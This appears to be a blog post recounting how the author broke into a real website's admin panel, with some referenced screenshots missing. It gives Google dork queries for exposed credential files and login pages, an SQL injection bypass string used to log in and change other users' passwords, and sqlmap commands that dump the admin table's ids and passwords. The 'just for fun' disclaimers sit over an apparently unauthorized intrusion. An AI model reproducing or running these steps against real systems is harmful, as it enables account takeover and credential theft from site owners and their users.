This article will record a journey how did i hack a website.
DON’T DO ANYTHING BAD!
1.Gathering more and more informations
Google is a very useful tool,make good use of google hacking may yield twice the result with half the effort. Some significant
grammars are as follow:
site:xxxx.com filetype:txtintext:usernameand password site:baidu.com -site:www.baidu.com -site:video.baidu.com // - :exclude site:xxx.net intext:login site:a2.xxxx.cominurl:file site:a2.xxxx.comfiletype:asp site:a2.xxxx.comfiletype:php site:a2.xxxx.comfiletype:aspx site:a3.xxxx.comfiletype:asp site:xxxx.comintitle:管理
I found a target by using :
it was a admin’s login page. Then we need to find this website’s ip ,usually these two ways:
Next,use nmap to find more info about this website:
Only 80 port was opened. In general, more ports opened means more potential security vulnerability.For this website ,we can only attack it’s http server.
Enter admin’ in the input box and it returned this page:
It means that the website exists sql injection.
Then use burpsuit to some basic test:
found some interesting test result, the sentence ‘ or 1=1 or ”=’ return different length of response,test this sentence:
Wow~ successful login !we can modify other user’s password:
But..that is not finished
3.Further penetration testing
Save the post request to post.txt through burp’s proxy,and call the sqlmap out:
sqlmap -r post.txt -p id --risk=3 --dbs
Boom…found it’s table name: adminid , continue:
sqlmap –r post.txt –p id --columns –T adminid
sqlmap -r post.txt -p id --dump -T adminid -C "id,passwd"
Haha.. admin’s id and password were out~
It’s just for fun,please don’t do sth bad~!